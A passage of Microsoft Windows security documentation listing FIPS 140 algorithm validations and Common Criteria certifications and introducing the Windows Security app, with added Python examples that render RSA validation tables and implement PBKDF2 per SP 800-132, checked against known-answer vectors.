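    for op in ("keygen", "siggen", "sigver"):
        print(render_rsa(op))
    print("TDES still listed:", surviving_tdes())
```

Running it reproduces the shape of the table: siggen keeps only 2048/3072/4096 with SHA-256/384/512, sigver keeps the whole grid (1024, 1536 and SHA-1 as legacy use), and two-key Triple DES survives for decryption only, which is why the newer SymCrypt entries list keying option 1 alone.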

SP 800-132 Password Based Key Derivation Function (PBKDF)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #


PBKDF (vendor affirmed)
Kernel Mode Cryptographic Primitives Library (cng.sys) Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 #2937 (Software Version: 10.0.14393)
Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 #2936 (Software Version: 10.0.14393)
Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 #2935 (Software Version: 10.0.14393)
Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 #2931 (Software Version: 10.0.14393)

PBKDF (vendor affirmed)
Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016 #2936 (Software Version: 10.0.14393)
Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG), vendor-affirmed
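The PBKDF rows above are "vendor affirmed", so unlike the SHS or Triple DES entries there is no CAVP certificate and no published test-vector run behind them. The following is an added example, not Microsoft's implementation and not part of the validation tables: PBKDF2 written out from the SP 800-132 (section 5.3) / RFC 8018 definition, checked against the RFC 6070 PBKDF2-HMAC-SHA1 known-answer vectors and against Python's own hashlib.pbkdf2_hmac, with the 128-bit salt and 1000-iteration minimums that SP 800-132 recommends enforced by a wrapper. The helper names (params_ok, derive_checked, matches_stdlib) and the constants are this example's own.

```python
# Added example (not Microsoft's code): SP 800-132 PBKDF2, the function the
# "PBKDF (vendor affirmed)" entries refer to, written from the specification
# and cross-checked against the standard library.
import hashlib
import hmac

MIN_SALT_BYTES = 16      # SP 800-132 section 5.1: salt of at least 128 bits
MIN_ITERATIONS = 1000    # SP 800-132 section 5.2: recommended minimum count


def pbkdf2(hash_name: str, password: bytes, salt: bytes,
           iterations: int, dk_len: int) -> bytes:
    """PBKDF2 (SP 800-132 section 5.3 / RFC 8018 section 5.2).

    DK = T_1 || T_2 || ... || T_l, truncated to dk_len bytes, where
    T_i = U_1 xor U_2 xor ... xor U_c,
    U_1 = HMAC(P, S || INT_32_BE(i)) and U_j = HMAC(P, U_{j-1}).
    """
    if iterations < 1 or dk_len < 1:
        raise ValueError("iterations and dk_len must be positive")
    h_len = hashlib.new(hash_name).digest_size
    blocks = -(-dk_len // h_len)                 # ceil(dk_len / h_len)
    out = bytearray()
    for i in range(1, blocks + 1):
        u = hmac.new(password, salt + i.to_bytes(4, "big"), hash_name).digest()
        t = bytearray(u)
        for _ in range(iterations - 1):
            u = hmac.new(password, u, hash_name).digest()
            t = bytearray(a ^ b for a, b in zip(t, u))
        out += t
    return bytes(out[:dk_len])


def params_ok(salt: bytes, iterations: int) -> bool:
    """The SP 800-132 parameter check a caller should apply before deriving."""
    return len(salt) >= MIN_SALT_BYTES and iterations >= MIN_ITERATIONS


def derive_checked(hash_name: str, password: bytes, salt: bytes,
                   iterations: int, dk_len: int) -> bytes:
    """PBKDF2 that refuses weak parameters instead of silently accepting them."""
    if not params_ok(salt, iterations):
        raise ValueError("salt must be >= 128 bits and iterations >= 1000")
    return pbkdf2(hash_name, password, salt, iterations, dk_len)


def matches_stdlib(hash_name: str, password: bytes, salt: bytes,
                   iterations: int, dk_len: int) -> bool:
    """Cross-check this implementation against hashlib.pbkdf2_hmac."""
    mine = pbkdf2(hash_name, password, salt, iterations, dk_len)
    ref = hashlib.pbkdf2_hmac(hash_name, password, salt, iterations, dk_len)
    return hmac.compare_digest(mine, ref)


if __name__ == "__main__":
    # RFC 6070 known-answer vector for PBKDF2-HMAC-SHA1 (published test data).
    print(pbkdf2("sha1", b"password", b"salt", 4096, 20).hex())
    # -> 4b007901b765489abead49d926f721d065a429c1
    print(matches_stdlib("sha256", b"correct horse", b"0123456789abcdef", 1000, 48))
```

The RFC 6070 vectors use a 4-byte salt and a single iteration, which is exactly what derive_checked rejects: they exist to test the arithmetic, not to model a deployment, and a system claiming SP 800-132 conformance should enforce the salt and iteration minimums at the call site rather than trust every caller.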

Component Validation List

Publication / Component Validated / Description | Implementation and Certificate #

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 MsBignum Cryptographic Implementations #1540
Version 6.3.9600
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #489

Microsoft Surface Hub Virtual TPM Implementations #1519
Version 10.0.15063.674
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #1518
Version 10.0.16299
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Microsoft Surface Hub MsBignum Cryptographic Implementations #1517
Version 10.0.15063.674
RSADP: Modulus Size: 2048 (bits)

Microsoft Surface Hub MsBignum Cryptographic Implementations #1516
Version 10.0.15063.674
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Microsoft Surface Hub MsBignum Cryptographic Implementations #1515
Version 10.0.15063.674
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #1732

Microsoft Surface Hub SymCrypt Cryptographic Implementations #1514
Version 10.0.15063.674
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #1732

Microsoft Surface Hub SymCrypt Cryptographic Implementations #1513
Version 10.0.15063.674
RSADP: Modulus Size: 2048 (bits)

Microsoft Surface Hub SymCrypt Cryptographic Implementations #1512
Version 10.0.15063.674
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Microsoft Surface Hub SymCrypt Cryptographic Implementations #1511
Version 10.0.15063.674
IKEv1: Methods: Digital Signature, Pre-shared Key, Public Key Encryption; Pre-shared Key Length: 64-2048
Diffie-Hellman shared secrets: Length: 2048 (bits), SHA Functions: SHA-256; Length: 256 (bits), SHA Functions: SHA-256; Length: 384 (bits), SHA Functions: SHA-384
Prerequisite: SHS #4011, HMAC #3269
IKEv2: Derived Keying Material length: 192-1792
Diffie-Hellman shared secrets: Length: 2048 (bits), SHA Functions: SHA-256; Length: 256 (bits), SHA Functions: SHA-256; Length: 384 (bits), SHA Functions: SHA-384
Prerequisite: SHS #4011, HMAC #3269
TLS: Supports TLS 1.0/1.1; Supports TLS 1.2: SHA Functions: SHA-256, SHA-384
Prerequisite: SHS #4011, HMAC #3269

Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1510
Version 10.0.15254
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #1731

Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1509
Version 10.0.15254
RSADP: Modulus Size: 2048 (bits)

Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1508
Version 10.0.15254
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1507
Version 10.0.15254
IKEv1: Methods: Digital Signature, Pre-shared Key, Public Key Encryption; Pre-shared Key Length: 64-2048
Diffie-Hellman shared secrets: Length: 2048 (bits), SHA Functions: SHA-256; Length: 256 (bits), SHA Functions: SHA-256; Length: 384 (bits), SHA Functions: SHA-384
Prerequisite: SHS #4010, HMAC #3268
IKEv2: Derived Keying Material length: 192-1792
Diffie-Hellman shared secrets: Length: 2048 (bits), SHA Functions: SHA-256; Length: 256 (bits), SHA Functions: SHA-256; Length: 384 (bits), SHA Functions: SHA-384
Prerequisite: SHS #4010, HMAC #3268
TLS: Supports TLS 1.0/1.1; Supports TLS 1.2: SHA Functions: SHA-256, SHA-384
Prerequisite: SHS #4010, HMAC #3268

Windows 10 Mobile (version 1709) MsBignum Cryptographic Implementations #1506
Version 10.0.15254
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #1731

Windows 10 Mobile (version 1709) MsBignum Cryptographic Implementations #1505
Version 10.0.15254
RSADP: Modulus Size: 2048 (bits)

Windows 10 Mobile (version 1709) MsBignum Cryptographic Implementations #1504
Version 10.0.15254
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); MsBignum Cryptographic Implementations #1503
Version 10.0.16299
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #1730

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); MsBignum Cryptographic Implementations #1502
Version 10.0.16299
RSADP: Modulus Size: 2048 (bits)

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); MsBignum Cryptographic Implementations #1501
Version 10.0.16299
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1499
Version 10.0.16299
ECDSA SigGen: P-256 SHA: SHA-256; P-384 SHA: SHA-384; P-521 SHA: SHA-512
Prerequisite: DRBG #1730

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1498
Version 10.0.16299
RSADP: Modulus Size: 2048 (bits)

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1497
Version 10.0.16299
RSASP1: Modulus Size: 2048 (bits); Padding Algorithms: PKCS 1.5

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1496
Version 10.0.16299
IKEv1: Methods: Digital Signature, Pre-shared Key, Public Key Encryption; Pre-shared Key Length: 64-2048
Diffie-Hellman shared secrets: Length: 2048 (bits), SHA Functions: SHA-256; Length: 256 (bits), SHA Functions: SHA-256; Length: 384 (bits), SHA Functions: SHA-384
Prerequisite: SHS #4009, HMAC #3267
IKEv2: Derived Keying Material length: 192-1792
Diffie-Hellman shared secrets: Length: 2048 (bits), SHA Functions: SHA-256; Length: 256 (bits), SHA Functions: SHA-256; Length: 384 (bits), SHA Functions: SHA-384
Prerequisite: SHS #4009, HMAC #3267
TLS: Supports TLS 1.0/1.1; Supports TLS 1.2: SHA Functions: SHA-256, SHA-384
Prerequisite: SHS #4009, HMAC #3267
FIPS186-4 ECDSA
Signature Generation of hash sized messages
ECDSA SigGen Component: CURVES( P-256 P-384 P-521 )

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
MsBignum Cryptographic Implementations #1284
Version 10.0.15063

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
SymCrypt Cryptographic Implementations #1279
Version 10.0.15063

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update
MsBignum Cryptographic Implementations #922
Version 10.0.14393

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update
Virtual TPM Implementations #894
Version 10.0.14393

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55”
MsBignum Cryptographic Implementations #666
Version 10.0.10586

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100
MsBignum Cryptographic Implementations #288
Version 6.3.9600
FIPS186-4 RSA; PKCS#1 v2.1
RSASP1 Signature Primitive
RSASP1: (Mod2048: PKCS1.5 PKCSPSS)

Windows 10 Creators Update (version 1703) Pro, Enterprise, Education
Virtual TPM Implementations #1285
Version 10.0.15063

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
MsBignum Cryptographic Implementations #1282
Version 10.0.15063

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
SymCrypt Cryptographic Implementations #1280
Version 10.0.15063

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update
Virtual TPM Implementations #893
Version 10.0.14393

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update
MsBignum Cryptographic Implementations #888
Version 10.0.14393

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55”
MsBignum Cryptographic Implementations #665
Version 10.0.10586

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10
MsBignum Cryptographic Implementations #572
Version 10.0.10240

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry
MsBignum Cryptographic Implementations #289
Version 6.3.9600
FIPS186-4 RSA; RSADP
RSADP Primitive
RSADP: (Mod2048)

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
MsBignum Cryptographic Implementations #1283
Version 10.0.15063

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
SymCrypt Cryptographic Implementations #1281
Version 10.0.15063

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update
Virtual TPM Implementations #895
Version 10.0.14393

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update
Cryptography Next Generation (CNG) Implementations #887
Version 10.0.14393

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55”
Cryptography Next Generation (CNG) Implementations #663
Version 10.0.10586

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10
Cryptography Next Generation (CNG) Implementations #576
Version 10.0.10240
SP800-135
Section 4.1.1, IKEv1
Section 4.1.2, IKEv2
Section 4.2, TLS

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709)
SymCrypt Cryptographic Implementations #1496
Version 10.0.16299

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile
SymCrypt Cryptographic Implementations #1278
Version 10.0.15063

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1140
Version 7.00.2872

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1139
Version 8.00.6246

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update
BcryptPrimitives and NCryptSSLp #886
Version 10.0.14393

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55”
BCryptPrimitives and NCryptSSLp #664
Version 10.0.10586

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10
BCryptPrimitives and NCryptSSLp #575
Version 10.0.10240

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100
BCryptPrimitives and NCryptSSLp #323
Version 6.3.9600

References
[FIPS 140] - FIPS 140-2, Security Requirements for Cryptographic Modules
[FIPS FAQ] - Cryptographic Module Validation Program (CMVP) FAQ
[SP 800-57] - Recommendation for Key Management – Part 1: General (Revised)
[SP 800-131A] - Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key
Lengths
Additional Microsoft References
Enabling FIPS mode - http://support.microsoft.com/kb/811833
Cipher Suites in Schannel - http://msdn.microsoft.com/library/aa374757(VS.85).aspx
Common Criteria Certifications
4/8/2019

Microsoft is committed to optimizing the security of its products and services. As part of that commitment,
Microsoft supports the Common Criteria certification program, continues to ensure that products incorporate the
features and functions required by relevant Common Criteria protection profiles, and completes Common Criteria
certifications of Microsoft Windows products.

Common Criteria Security Targets


Information for Systems Integrators and Accreditors
The Security Target describes security functionality and assurance measures used to evaluate Windows.
Microsoft Windows 10 (April 2018 Update)
Microsoft Windows 10 (Fall Creators Update)
Microsoft Windows 10 (Creators Update)
Microsoft Windows Server 2016, Microsoft Windows Server 2012 R2, and Microsoft Windows 10 Hyper-V
Microsoft Windows 10 (Anniversary Update) and Windows 10 Mobile (Anniversary Update)
Microsoft Windows 10 (Anniversary Update) and Windows Server 2016
Windows 10 (Anniversary Update) and Windows Server 2016 IPsec VPN Client
Microsoft Windows 10 IPsec VPN Client
Microsoft Windows 10 November 2015 Update with Surface Book
Microsoft Windows 10 Mobile with Lumia 950, 950 XL, 550, 635, and Windows 10 with Surface Pro 4
Windows 10 and Windows Server 2012 R2
Windows 10
Windows 8.1 with Surface 3 and Windows Phone 8.1 with Lumia 635 and Lumia 830
Microsoft Surface Pro 3 and Windows 8.1
Windows 8.1 and Windows Phone 8.1
Windows 8 and Windows Server 2012
Windows 8 and Windows RT
Windows 8 and Windows Server 2012 BitLocker
Windows 8, Windows RT, and Windows Server 2012 IPsec VPN Client
Windows 7 and Windows Server 2008 R2
Microsoft Windows Server 2008 R2 Hyper-V Role
Windows Vista and Windows Server 2008 at EAL4+
Microsoft Windows Server 2008 Hyper-V Role
Windows Vista and Windows Server 2008 at EAL1
Windows Server 2003 SP2 including R2, x64, and IA64; Windows XP Professional SP2 and x64 SP2; and
Windows XP Embedded SP2
Windows Server 2003 Certificate Server
Windows Rights Management Services (RMS) 1.0 SP2

Common Criteria Deployment and Administration


Information for IT Administrators
These documents describe how to configure Windows to replicate the configuration used during the Common
Criteria evaluation.
Windows 10, Windows 10 Mobile, Windows Server 2016, Windows Server 2012 R2
Microsoft Windows 10 (April 2018 Update)
Microsoft Windows 10 (Fall Creators Update)
Microsoft Windows 10 (Creators Update)
Microsoft Windows Server 2016, Microsoft Windows Server 2012 R2, and Microsoft Windows 10 Hyper-V
Microsoft Windows 10 (Anniversary Update) and Windows 10 Mobile (Anniversary Update)
Microsoft Windows 10 (Anniversary Update) and Windows Server 2016
Windows 10 (Anniversary Update) and Windows Server 2016 IPsec VPN Client Operational Guidance
Microsoft Windows 10 IPsec VPN Client
Microsoft Windows 10 November 2015 Update with Surface Book Administrative Guide
Microsoft Windows 10 Mobile and Windows 10 Administrative Guide
Windows 10 and Windows Server 2012 R2 Administrative Guide
Windows 10 Common Criteria Operational Guidance
Windows 8.1 and Windows Phone 8.1
Microsoft Surface Pro 3 Common Criteria Mobile Operational Guidance
Windows 8.1 and Windows Phone 8.1 CC Supplemental Admin Guide
Windows 8, Windows RT, and Windows Server 2012
Windows 8 and Windows Server 2012
Windows 8 and Windows RT
Windows 8 and Windows Server 2012 BitLocker
Windows 8, Windows RT, and Windows Server 2012 IPsec VPN Client
Windows 7 and Windows Server 2008 R2
Windows 7 and Windows Server 2008 R2 Supplemental CC Guide
Windows Server 2008 R2 Hyper-V Common Criteria Configuration Guide
Windows Vista and Windows Server 2008
Windows Vista and Windows Server 2008 Supplemental CC Guide
Windows Server 2008 Hyper-V Role Common Criteria Administrator Guide
Windows Server 2003 SP2 including R2, x64, and Itanium
Windows Server 2003 SP2 R2 Common Criteria Administrator Guide 3.0
Windows Server 2003 SP2 R2 Common Criteria Configuration Guide 3.0
Windows Server 2003 SP1(x86), x64, and IA64
Windows Server 2003 with x64 Hardware Administrator's Guide
Windows Server 2003 with x64 Hardware Configuration Guide
Windows Server 2003 SP1
Windows Server 2003 Administrator's Guide
Windows Server 2003 Configuration Guide
Windows XP Professional SP2 (x86) and x64 Edition
Windows XP Common Criteria Administrator Guide 3.0
Windows XP Common Criteria Configuration Guide 3.0
Windows XP Common Criteria User Guide 3.0
Windows XP Professional with x64 Hardware Administrator's Guide
Windows XP Professional with x64 Hardware Configuration Guide
Windows XP Professional with x64 Hardware User’s Guide
Windows XP Professional SP2, and XP Embedded SP2
Windows XP Professional Administrator's Guide
Windows XP Professional Configuration Guide
Windows XP Professional User's Guide
Windows Server 2003 Certificate Server
Windows Server 2003 Certificate Server Administrator's Guide
Windows Server 2003 Certificate Server Configuration Guide
Windows Server 2003 Certificate Server User's Guide

Common Criteria Evaluation Technical Reports and Certification / Validation Reports
Information for Systems Integrators and Accreditors
An Evaluation Technical Report (ETR) is a report submitted to the Common Criteria certification authority for how
Windows complies with the claims made in the Security Target. A Certification / Validation Report provides the
results of the evaluation by the validation team.
Microsoft Windows 10 (April 2018 Update)
Microsoft Windows 10 (Fall Creators Update)
Microsoft Windows 10 (Creators Update)
Microsoft Windows Server 2016, Microsoft Windows Server 2012 R2, and Microsoft Windows 10 Hyper-V
Microsoft Windows 10 (Anniversary Update) and Windows 10 Mobile (Anniversary Update)
Microsoft Windows 10 (Anniversary Update) and Windows Server 2016
Windows 10 (Anniversary Update) and Windows Server 2016 IPsec VPN Client
Microsoft Windows 10 IPsec VPN Client
Microsoft Windows 10 November 2015 Update with Surface Book
Microsoft Windows 10 Mobile with Lumia 950, 950 XL, 550, 635, and Windows 10 with Surface Pro 4
Windows 10 and Windows Server 2012 R2
Windows 10
Windows 8.1 with Surface 3 and Windows Phone 8.1 with Lumia 635 and Lumia 830
Microsoft Surface Pro 3 and Windows 8.1
Windows 8.1 and Windows Phone 8.1
Windows 8 and Windows Server 2012
Windows 8 and Windows RT
Windows 8 and Windows Server 2012 BitLocker
Windows 8, Windows RT, and Windows Server 2012 IPsec VPN Client
Windows 7 and Windows Server 2008 R2 Validation Report
Windows Vista and Windows Server 2008 Validation Report at EAL4+
Windows Server 2008 Hyper-V Role Certification Report
Windows Vista and Windows Server 2008 Certification Report at EAL1
Windows XP / Windows Server 2003 with x64 Hardware ETR
Windows XP / Windows Server 2003 with x64 Hardware ETR, Part II
Windows Server 2003 SP2 including R2, Standard, Enterprise, Datacenter, x64, and Itanium Editions Validation
Report
Windows XP Professional SP2 and x64 SP2 Validation Report
Windows XP Embedded SP2 Validation Report
Windows XP and Windows Server 2003 ETR
Windows XP and Windows Server 2003 Validation Report
Windows Server 2003 Certificate Server ETR
Windows Server 2003 Certificate Server Validation Report
Microsoft Windows Rights Management Services (RMS) 1.0 SP2 Validation Report

Other Common Criteria Related Documents


Identifying Windows XP and Windows Server 2003 Common Criteria Certified Requirements for the NIST
Special Publication 800-53
The Windows Security app
4/5/2019

Applies to
Windows 10, version 1703 and later
This library describes the Windows Security app, and provides information on configuring certain features,
including:
Showing and customizing contact information on the app and in notifications
Hiding notifications
In Windows 10, version 1709 and later, the app also shows information from third-party antivirus and firewall
apps.
In Windows 10, version 1803, the app has two new areas, Account protection and Device security.
NOTE
The Windows Security app is a client interface on Windows 10, version 1703 and later. It is not the Windows Defender
Security Center web portal console that is used to review and manage Windows Defender Advanced Threat Protection.

You can't uninstall the Windows Security app, but you can do one of the following:
Disable the interface on Windows Server 2016. See Windows Defender Antivirus on Windows Server 2016.
Hide all of the sections on client computers (see below).
Disable Windows Defender Antivirus, if needed. See Enable and configure Windows Defender AV always-on
protection and monitoring.
You can find more information about each section, including options for configuring the sections - such as hiding
each of the sections - at the following topics:
Virus & threat protection, which has information and access to antivirus ransomware protection settings and
notifications, including the Controlled folder access feature of Windows Defender Exploit Guard and sign-in to
Microsoft OneDrive.
Account protection, which has information and access to sign-in and account protection settings.
Firewall & network protection, which has information and access to firewall settings, including Windows
Defender Firewall.
App & browser control, covering Windows Defender SmartScreen settings and Exploit protection mitigations.
Device security, which provides access to built-in device security settings.
Device performance & health, which has information about drivers, storage space, and general Windows
Update issues.
Family options, which includes access to parental controls along with tips and information for keeping kids safe
online.

NOTE
If you hide all sections then the app will show a restricted interface, as in the following screenshot:

Open the Windows Security app

Click the icon in the notification area on the taskbar.
Search the Start menu for Windows Security.
Open an area from Windows Settings.
NOTE
Settings configured with management tools, such as Group Policy, Microsoft Intune, or System Center Configuration
Manager, will generally take precedence over the settings in the Windows Security app. See the topics for each of the sections
for links to configuring the associated features or products.

How the Windows Security app works with Windows security features
IMPORTANT
Windows Defender AV and the Windows Security app use similarly named services for specific purposes.
The Windows Security app uses the Windows Security Service (SecurityHealthService or Windows Security Health Service),
which in turn utilizes the Security Center service (wscsvc) to ensure the app provides the most up-to-date information about
the protection status on the endpoint, including protection offered by third-party antivirus products, Windows Defender
Firewall, third-party firewalls, and other security protection.
These services do not affect the state of Windows Defender AV. Disabling or modifying these services will not disable
Windows Defender AV, but it will lead to a lowered protection state on the endpoint, even if you are using a third-party
antivirus product.
Windows Defender AV will be disabled automatically when a third-party antivirus product is installed and kept up to date.
Disabling the Windows Security Center service will not disable Windows Defender AV or Windows Defender Firewall.

WARNING
If you disable the Security Center service, or configure its associated Group Policy settings to prevent it from starting or
running, the Windows Security app may display stale or inaccurate information about any antivirus or firewall products you
have installed on the device.
It may also prevent Windows Defender AV from enabling itself if you have an old or outdated third-party antivirus, or if you
uninstall any third-party antivirus products you may have previously installed.
This will significantly lower the protection of your device and could lead to malware infection.

The Windows Security app operates as a separate app or process from each of the individual features, and will
display notifications through the Action Center.
It acts as a collector or single place to see the status and perform some configuration for each of the features.
Disabling any of the individual features (through Group Policy or other management tools, such as System Center
Configuration Manager) will prevent that feature from reporting its status in the Windows Security app. The
Windows Security app itself will still run and show status for the other security features.

IMPORTANT
